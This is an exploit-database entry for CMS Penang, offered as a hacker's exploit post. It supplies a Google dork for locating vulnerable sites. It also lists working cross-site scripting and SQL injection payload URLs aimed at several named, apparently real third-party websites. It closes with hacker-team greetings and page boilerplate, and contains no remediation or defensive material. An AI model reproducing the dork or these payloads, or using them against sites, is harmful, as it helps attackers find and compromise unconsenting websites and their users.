CMS Penang SQL Injection XSS

2016.07.03
Credit: Bl4ck M4n
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------[+] |[+] Exploit Title: CMS Penang SQL Injection AND xss |[+] |[+] Exploit Author: Bl4ck M4n |[+] |[+] Sit: iedb.ir/ iedb.ir/acc xssed.ir |[+] |[+] Google Dork: inurl:About.php?id= |[+] |[+] Tested on: Windows 10 , Mozilla Firefox |[+] |[+] |------------------------------------------------------------[+] |[+] Demo: xss |[+] |[+] http://www.slavsandtatars.com/about.php?id=25%22%3E%3Chtml%3E%3Ch1%3EBl4ck%20M4n%20%3C/ |[+] http://www.radimpex.rs/about.php?id=1&lang=en%22%3E%3Chtml%3E%3Ch1%3EBl4ck%20M4n%20%3C/ |[+] |[+] Demo: sql |[+] |[+] http://www.micro-mechanics.com/about.php?id=3%27 |[+] https://www.radioergo.org/about.php?id=1%27 |[+] http://www.scottfss.org/about.php?id=18%27 |[+] http://www.highlandsgroup.net/about.php?ID=1%27 |[+} |----------------------------------------------------------[+] |[+] My Accounts :- |[+] |[+] ID:joker_s_hack_s@yahoo.com |[+] |[+] https://twitter.com/M4nBl4ck |----------------------------------------------------[+] |[+] G2 Team :- |[+] Members: T34m D4rkn3ss R00m:- |[+] 1- Nine9 |[+] 2- Safaa Hacker |[+] 3- xIL3zr |[+] 5- MjHoL HackEr |[+] 6- Hurabii HaCkEr |[+] 7- 1337r00t |[+] 8- FreeDom |[+] 9- Amir |[+]-------------------------------------------[+] |[+] Twitter : M4nBl4ck |[+] |[+] Greetz : Amir / B3HZ4D / Mahdi-X |[+] |[+] And All Member In Arbi AND Iranian |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top